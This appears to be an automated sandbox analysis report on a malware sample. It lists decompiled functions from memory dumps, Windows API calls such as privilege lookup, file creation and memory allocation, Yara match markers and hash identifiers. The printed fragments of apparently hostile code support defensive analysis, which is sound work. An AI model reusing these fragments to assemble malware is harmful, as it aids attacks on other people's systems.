                                                                                                                          				void* _t17;
                                                                                                                          				intOrPtr* _t18;
                                                                                                                          
                                                                                                                          				asm("cli");
                                                                                                                          				 *((intOrPtr*)(__eax - 3)) =  *((intOrPtr*)(__eax - 3)) - __ch;
                                                                                                                          				if(__ebx >= 0) {
                                                                                                                          					_t12 = _a12;
                                                                                                                          					_t16 =  *_t18;
                                                                                                                          					return  *_t16(_t12, _t17);
                                                                                                                          				} else {
                                                                                                                          					__ebp = __esp;
                                                                                                                          					__eax = _a4;
                                                                                                                          					_t6 = __eax + 0xc74; // 0xc74
                                                                                                                          					__esi = _t6;
                                                                                                                          					__eax = _a12;
                                                                                                                          					__eax = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                          					__esi = __esi;
                                                                                                                          					__ebp = __ebp;
                                                                                                                          					return __eax;
                                                                                                                          				}
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: hA
                                                                                                                          • API String ID: 3298025750-1221461045
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 38%
                                                                                                                          			E004184F2(signed int __eax, signed int __ebx, signed int __ecx, intOrPtr* __esi, intOrPtr _a4, int _a8, long _a12, void* _a16) {
                                                                                                                          				void* _t19;
                                                                                                                          				long _t20;
                                                                                                                          				char _t25;
                                                                                                                          				intOrPtr* _t29;
                                                                                                                          				void* _t32;
                                                                                                                          				void* _t35;
                                                                                                                          				void* _t44;
                                                                                                                          
                                                                                                                          				asm("in al, 0xb6");
                                                                                                                          				asm("popad");
                                                                                                                          				asm("lodsd");
                                                                                                                          				_t1 = __eax - 0x28;
                                                                                                                          				 *_t1 =  *(__eax - 0x28) << __ecx;
                                                                                                                          				_t19 = _t44;
                                                                                                                          				if( *_t1 <= 0) {
                                                                                                                          					_t13 = __eax;
                                                                                                                          					__eax = __esi;
                                                                                                                          					__esi = _t13;
                                                                                                                          					_push(0x8b55d514);
                                                                                                                          					__eax = _a4;
                                                                                                                          					__ecx =  *((intOrPtr*)(__eax + 0xa14));
                                                                                                                          					_push(__esi);
                                                                                                                          					__esi = __eax + 0xc7c;
                                                                                                                          					__eax =  *__esi;
                                                                                                                          					ExitProcess(_a8);
                                                                                                                          				}
                                                                                                                          				asm("cli");
                                                                                                                          				 *((intOrPtr*)(_t19 - 3)) =  *((intOrPtr*)(_t19 - 3)) - __ecx;
                                                                                                                          				if((__ebx ^ __eax) >= 0) {
                                                                                                                          					_t20 = _a12;
                                                                                                                          					_t29 =  *((intOrPtr*)(__esi));
                                                                                                                          					return  *_t29(_t20, _t32);
                                                                                                                          				} else {
                                                                                                                          					_t22 = _a4;
                                                                                                                          					_push(__esi);
                                                                                                                          					_t9 = _t22 + 0xc74; // 0xc74
                                                                                                                          					E00418DB0(_t35, _a4, _t9,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                          					_t25 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                          					return _t25;
                                                                                                                          				}
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitFreeHeapProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1180424539-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                          				char _v67;
                                                                                                                          				char _v68;
                                                                                                                          				void* _t12;
                                                                                                                          				intOrPtr* _t13;
                                                                                                                          				int _t14;
                                                                                                                          				long _t21;
                                                                                                                          				intOrPtr* _t25;
                                                                                                                          				void* _t26;
                                                                                                                          				void* _t30;
                                                                                                                          
                                                                                                                          				_t30 = __eflags;
                                                                                                                          				_v68 = 0;
                                                                                                                          				L00419D10( &_v67, 0, 0x3f);
                                                                                                                          				E0041A8F0( &_v68, 3);
                                                                                                                          				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                                                                          				_t13 = L00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                          				_t25 = _t13;
                                                                                                                          				if(_t25 != 0) {
                                                                                                                          					_t21 = _a8;
                                                                                                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                                                          					_t32 = _t14;
                                                                                                                          					if(_t14 == 0) {
                                                                                                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                          					}
                                                                                                                          					return _t14;
                                                                                                                          				}
                                                                                                                          				return _t13;
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1836367815-0
                                                                                                                          • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                                                          • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                                                                          • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                                                          • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 35%
                                                                                                                          			E00418613(void* __eax, void* __edx, void* __esi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                          				int _t23;
                                                                                                                          				void* _t32;
                                                                                                                          				void* _t34;
                                                                                                                          				short* _t35;
                                                                                                                          
                                                                                                                          				asm("lock into");
                                                                                                                          				_t34 = __esi - 1;
                                                                                                                          				if(_t34 < 0) {
                                                                                                                          					_t15 = _a8;
                                                                                                                          					_t35 =  &(_a8[0x648]);
                                                                                                                          					E00418DB0(_t32, _a8, _t35,  *((intOrPtr*)(_t15 + 0xa18)), 0, 0x47);
                                                                                                                          					return  *( *_t35)(_a12, _a16, _t34);
                                                                                                                          				} else {
                                                                                                                          					asm("aad 0x41");
                                                                                                                          					 *(__edx + 0x7b) =  !( *(__edx + 0x7b));
                                                                                                                          					asm("arpl [ebp-0x75], dx");
                                                                                                                          					_t20 = _a4;
                                                                                                                          					_push(_t34);
                                                                                                                          					E00418DB0(_t32, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t20 + 0xa18)), 0, 0x46);
                                                                                                                          					_t23 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                          					return _t23;
                                                                                                                          				}
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 31f0a129261cd33b100c1778542410d3142e1cff176ccc205ec9e2f5ebc42cde
                                                                                                                          • Instruction ID: 7f7508aad84286ad71e3ebe43307837e1acc198c442f721a51bec9a598e9ecf7
                                                                                                                          • Opcode Fuzzy Hash: 31f0a129261cd33b100c1778542410d3142e1cff176ccc205ec9e2f5ebc42cde
                                                                                                                          • Instruction Fuzzy Hash: 06017CB1600204BFDB14DF94DC85FEB77A8EF85350F104569FA0DAB281CA34A9508BE4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                          				char _t10;
                                                                                                                          				void* _t15;
                                                                                                                          
                                                                                                                          				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                          				L00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                          				return _t10;
                                                                                                                          			}





                                                                                                                          0x004184cf
                                                                                                                          0x004184d7
                                                                                                                          0x004184ed
                                                                                                                          0x004184f1

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                          • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                          • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                                          				void* _t10;
                                                                                                                          				void* _t15;
                                                                                                                          
                                                                                                                          				L00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                          				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                                                          				return _t10;
                                                                                                                          			}





                                                                                                                          0x00418497
                                                                                                                          0x004184ad
                                                                                                                          0x004184b1

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                          • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                          				int _t10;
                                                                                                                          				void* _t15;
                                                                                                                          
                                                                                                                          				L00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                          				return _t10;
                                                                                                                          			}





                                                                                                                          0x0041863a
                                                                                                                          0x00418650
                                                                                                                          0x00418654

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                          • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                          • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00418500(intOrPtr _a4, int _a8) {
                                                                                                                          				void* _t10;
                                                                                                                          
                                                                                                                          				_t5 = _a4;
                                                                                                                          				L00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                          				ExitProcess(_a8);
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 84545cd4aeedc4ef23bf99d8ada4f8a82d298225ece2f5941e1d241395f67288
                                                                                                                          • Instruction ID: c8bf54a316f4bdde13ab6c4db1985b51c4c89a7d7204f0fb4a973feccf6103a8
                                                                                                                          • Opcode Fuzzy Hash: 84545cd4aeedc4ef23bf99d8ada4f8a82d298225ece2f5941e1d241395f67288
                                                                                                                          • Instruction Fuzzy Hash: 3290027120258002D251715A844461B5145A7E0381F61C421E4815554C86558C56E261
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: afdab09f39a0dc87cc5fd82091cb8be4378a29da8f9e779d2d6f5b2f25f2c45f
                                                                                                                          • Instruction ID: 272a022a0631d68baadcf439825f3554ceed875f94fac419f0be8e50bdc8cfef
                                                                                                                          • Opcode Fuzzy Hash: afdab09f39a0dc87cc5fd82091cb8be4378a29da8f9e779d2d6f5b2f25f2c45f
                                                                                                                          • Instruction Fuzzy Hash: 02900271302140529611A69A5804A5A424597F0381B61D025A8404554C85948C61A161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 25dad22841eea99ce02de5a5b3123f0bd10d8a4f54256d6a74d5f200f0f367f2
                                                                                                                          • Instruction ID: 8db94153eb7307318d813bc01751a81a8029d188667535e73facb8665319ae64
                                                                                                                          • Opcode Fuzzy Hash: 25dad22841eea99ce02de5a5b3123f0bd10d8a4f54256d6a74d5f200f0f367f2
                                                                                                                          • Instruction Fuzzy Hash: 3590026124214802D251715A84147170146D7D0781F61C021A4414554D86568D65B6F1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c8db7d29c0b882e4406e73d83c126a74cd30bc5e1ead91fdaf6c26d0241444d9
                                                                                                                          • Instruction ID: 02f02f69db76d0b0644a96220e16910a2ae91fd86e565be855f2e03e7992a5a6
                                                                                                                          • Opcode Fuzzy Hash: c8db7d29c0b882e4406e73d83c126a74cd30bc5e1ead91fdaf6c26d0241444d9
                                                                                                                          • Instruction Fuzzy Hash: 2190026160614402D251715A5418716015597D0381F61D021A4414554DC6998E55B6E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 84a062c04169d84d42d0d7dcdcdd4c7699e5934da6f20c5fc6519853c52a3e22
                                                                                                                          • Instruction ID: 7e530b6e0e053b1b84ce5f28037c00378bcc1c2c80c1687246e2dedf3ada33f1
                                                                                                                          • Opcode Fuzzy Hash: 84a062c04169d84d42d0d7dcdcdd4c7699e5934da6f20c5fc6519853c52a3e22
                                                                                                                          • Instruction Fuzzy Hash: C490026120618442D211655A5408A16014597D0385F61D021A5454595DC6758C51F171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 86976c4e254330a6c73a942e7fc0d408bd5f0ad712a87800c2e32730c038f472
                                                                                                                          • Instruction ID: a1a9c5639a84299834827bb12f533bd9511f8ea8d6fab0df3e8ff2876ebe8ee8
                                                                                                                          • Opcode Fuzzy Hash: 86976c4e254330a6c73a942e7fc0d408bd5f0ad712a87800c2e32730c038f472
                                                                                                                          • Instruction Fuzzy Hash: 9590027520618442D611655A5804A97014597D0385F61D421A481459CD86948C61F161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5b89e408ee6d3606abff1b9c3a1752dabe4947bf11bf7e5945247c5814b6e7f7
                                                                                                                          • Instruction ID: a51e53d9305f2e0c05435182c295a7e843ae5944a43d76800657fab4b0a3adb7
                                                                                                                          • Opcode Fuzzy Hash: 5b89e408ee6d3606abff1b9c3a1752dabe4947bf11bf7e5945247c5814b6e7f7
                                                                                                                          • Instruction Fuzzy Hash: BD90027120214403D211615A5508717014597D0381F61D421A4814558DD6968C51B161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                          • Instruction ID: 6c3ecbcdbfa5b1839768083c60ed88c76218f26ef932fe6f2e32ca0ddd9a9c73
                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E00A2FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                          				void* _t7;
                                                                                                                          				intOrPtr _t9;
                                                                                                                          				intOrPtr _t10;
                                                                                                                          				intOrPtr* _t12;
                                                                                                                          				intOrPtr* _t13;
                                                                                                                          				intOrPtr _t14;
                                                                                                                          				intOrPtr* _t15;
                                                                                                                          
                                                                                                                          				_t13 = __edx;
                                                                                                                          				_push(_a4);
                                                                                                                          				_t14 =  *[fs:0x18];
                                                                                                                          				_t15 = _t12;
                                                                                                                          				_t7 = E009DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                          				_push(_t13);
                                                                                                                          				E00A25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                          				_t9 =  *_t15;
                                                                                                                          				if(_t9 == 0xffffffff) {
                                                                                                                          					_t10 = 0;
                                                                                                                          				} else {
                                                                                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                          				}
                                                                                                                          				_push(_t10);
                                                                                                                          				_push(_t15);
                                                                                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                          				return E00A25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A2FDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A2FE01
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A2FE2B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: d4bca438cd9f6cd2cc0acefde1c894bfd3c0892d53b4502edb0400a0b9b3e780
                                                                                                                          • Instruction ID: f4d6d559cb06619944ce20de26c6e356124c7c8901800a09c0d7084d2855e4a9
                                                                                                                          • Opcode Fuzzy Hash: d4bca438cd9f6cd2cc0acefde1c894bfd3c0892d53b4502edb0400a0b9b3e780
                                                                                                                          • Instruction Fuzzy Hash: D5F0FC725405117FD6211B59DD02F337B6AEB84730F154325F614555E1D962FC2097F0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00B03B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00B03B87,007A002E,00000000,00000060,00000000,00000000), ref: 00B081FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                          • Opcode ID: 05f9df406d82188d2fad85c5b2f98be6eff1f523da5d2a14eff4c0d6624fd620
                                                                                                                          • Instruction ID: 04a112cfda0e95a2d274c67131aebd5fd3c734f73ae90bb043c0077b40ea74ba
                                                                                                                          • Opcode Fuzzy Hash: 05f9df406d82188d2fad85c5b2f98be6eff1f523da5d2a14eff4c0d6624fd620
                                                                                                                          • Instruction Fuzzy Hash: 3701C9B2215508AFCB08CF98DC95DEB77A9AF8C354F15824CFA5DD7291C630E811CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00B03B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00B03B87,007A002E,00000000,00000060,00000000,00000000), ref: 00B081FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(00B03D42,5E972F59,FFFFFFFF,00B03A01,?,?,00B03D42,?,00B03A01,FFFFFFFF,5E972F59,00B03D42,?,00000000), ref: 00B082A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(00B03D42,5E972F59,FFFFFFFF,00B03A01,?,?,00B03D42,?,00B03A01,FFFFFFFF,5E972F59,00B03D42,?,00000000), ref: 00B082A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00AF2D11,00002000,00003000,00000004), ref: 00B083C9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00B03D20,?,?,00B03D20,00000000,FFFFFFFF), ref: 00B08305
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00B03D20,?,?,00B03D20,00000000,FFFFFFFF), ref: 00B08305
                                                                                                                          Memory Dump Source
